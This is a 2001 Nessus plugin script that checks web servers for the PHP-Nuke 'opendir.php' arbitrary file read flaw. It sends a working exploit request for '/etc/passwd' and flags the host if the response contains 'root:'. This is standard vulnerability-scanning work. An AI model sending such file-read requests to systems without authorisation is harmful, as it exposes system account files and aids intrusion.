#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#


if (description)
{
 script_id(10655);
 script_name(english:"PHP-Nuke' opendir");
 desc["english"] = "
The remote host has the CGI 'opendir.php' installed. This
CGI allows anyone to read arbitrary files with the privileges
of the web server (usually root or nobody).

Solution : upgrade your version of phpnuke
Risk Factor: Serious";

 script_description(english:desc["english"]);
 script_summary(english:"Determine if a remote host is vulnerable to the opendir.php vulnerability");
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses", francais:"Abus de CGI");
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison");
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}


port = get_kb_item("Services/www");
if(!port)port = 80;

port = is_cgi_installed("/opendir.php");
if(port)
{
 req = http_get(item:"/opendir.php?/etc/passwd", port:port);
 soc = open_sock_tcp(port);
 if(soc)
 {
  send(socket:soc, data:req);
  r = recv(socket:soc, length:4096);
  close(soc);
  if("root:" >< r){
  	security_hole(port);
	exit(0);
	}
 }
}

port = is_cgi_installed("opendir.php");
if(port)
{
 cgibin  = cgibin();
 req = http_get(item:string(cgibin, "/opendir.php?/etc/passwd"), port:port);
 soc = open_sock_tcp(port);
 if(soc)
 {
  send(socket:soc, data:req);
  r = recv(socket:soc, length:4096);
  close(soc);
  if("root:" >< r){
  	security_hole(port);
	exit(0);
	}
 
 }
}

